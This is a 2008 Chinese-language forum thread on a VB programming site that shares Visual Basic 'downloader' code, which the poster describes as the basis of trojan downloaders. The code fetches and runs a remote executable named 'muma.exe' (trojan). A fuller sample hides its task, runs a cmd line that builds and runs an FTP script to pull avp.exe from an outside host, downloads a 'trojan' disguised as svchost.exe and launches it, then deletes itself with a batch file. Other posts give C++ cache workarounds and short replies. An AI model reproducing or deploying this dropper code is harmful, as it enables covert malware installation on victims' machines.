2行代码实现下载并运行

261001126 · 发表于 2008-12-23 17:46:06

我开始抛砖了，各位看官接着。。。

这2行是很多下载者的地基

2行，当然不包括API声明

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Option Explicit
Private Sub Form_Load()
URLDownloadToFile 0, "http://www.baidu.com/muma.exe", "C:\261001126.exe", 0, 0
Shell "C:\261001126.exe"
End Sub

复制代码

DreamonII · 发表于 2008-12-23 17:49:54

http://www.baidu.com/muma.exe...
哪有这玩意儿啊。。

wajika · 发表于 2008-12-23 17:56:52

是调用IE下载吧？以前我看过

dyx726 · 发表于 2008-12-23 17:58:21

以前偶还可以用URLDownloadToFile这函数下载文件，可偶删掉IE7和.net 2.0后就不行了

wajika · 发表于 2008-12-23 18:01:39

哦原来是URLDownloadToFile，提醒楼主这个函数有问题的。
第一次下载好文件后，第二次就直接从IE临时文件夹里复制了。。

[ 本帖最后由 wajika 于 2008-12-23 18:14 编辑 ]

peace2008 · 发表于 2008-12-23 18:21:00

马上去试验一下，呵呵

[ 本帖最后由 peace2008 于 2008-12-23 18:27 编辑 ]

261001126 · 发表于 2008-12-23 19:03:29

其实我是想引出其他下载的代码出来。。

解决URLDownloadToFile缓存问题

URLDownloadToFile下载文件前先在本地的缓存中查找此文件
如果缓存有则不会再去网上抓最新的文件，所以我们还要解决URLDownloadToFile缓存的问题。
方法 1：
我们可以对URL进行改动，让它每次访问不同的URL但指向相同的页面，
例如在URL结尾添加一些无意义的参数:"http://www.dtapp.cn?abc=1"
这里的 ?abc=1 可以随机实现，下次下载则改成 ?abc=2 因为URL不同，所以不会在缓存中找到。
最后程序改成：
/********************************************************/
int nRand = time(NULL); // 用时间作为随机数
CString szUrl;
szUrl.Format("http://www.dtapp.cn?abc=%d", nRand); // 生成随机URL
CString szFileName = "C:\\dtapp.txt";
if (S_OK == URLDownloadToFile(NULL, szUrl, szFileName, NULL,NULL))
{
// 下载成功
}
else
{
// 下载失败
}
方法 2：
使用DeleteUrlCacheEntry清理缓存后再使用URLDownloadToFile下载文件。
/********************************************************/
CString szUrl = "http://www.dtapp.cn";
DeleteUrlCacheEntry (szUrl); // 清理缓存
CString szFileName = "C:\\dtapp.txt";
if (S_OK == URLDownloadToFile(NULL, szUrl, szFileName, NULL,NULL))
{
// 下载成功
}
else
{
// 下载失败
}

复制代码

261001126 · 发表于 2008-12-23 19:07:02

这里有一个下载者

运行时采用ShellExecute而不是纯shell

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Sub Form_Load()
App.TaskVisible = False
Shell "cmd /c echo open vvv3.3322.org>>log.sys&echo tat>>log.sys&echo 123>>log.sys&echo bin>>log.sys&echo get avp.exe>>log.sys&echo bye>>log.sys&ftp -s:log.sys&del log.sys&avp.exe", 0
If Len(Dir("c:\windows\system32\scvhost.exe")) = 0 Then URLDownloadToFile 0, "http://www.ptc5188.cn/avp.exe", "c:\Program Files\svchost.exe", 0, 0 '第2个参数是你的木马地址，第3个是保存的位置，其他默认就可以
ShellExecute 0, vbNullString, "c:\Program Files\svchost.exe", vbNullString, vbNullString, vbNormalFocus 'ShellExecute的第2个参数是你要运行的文件，也就是我们下到本地的木马地址了
Dim s As String
On Error Resume Next
s = CurDir '当前目录
'保证目录最后的字符为 ""
If Right(s, 1) <> "" Then
s = s & ""
End If '在当前目录下创建bat文件
Open s & "kill.bat" For Output As #1
Print #1, ":redel"
Print #1, "del " & Chr(34) & s & App.EXEName & ".exe" & Chr(34)
Print #1, "if exist " & Chr(34) & s & App.EXEName & ".exe" & Chr(34) & " goto redel"
Print #1, "del %0"
Print #1,
Close #1
Shell Chr(34) & s & "kill.bat" & Chr(34)
End
End Sub
Private Sub Timer1_Timer()
Date = Date + 3000
End Sub

复制代码

cnlamb · 发表于 2008-12-23 19:15:07

我通常都是先Kill，然后再xxx.....

cfhcfh · 发表于 2008-12-23 19:16:33

学习

		自动登录	找回密码
密码			立即注册

VBGood网站全文搜索

[经验技巧] 2行代码实现下载并运行

评分

评分

评分

回复 #5 wajika 的帖子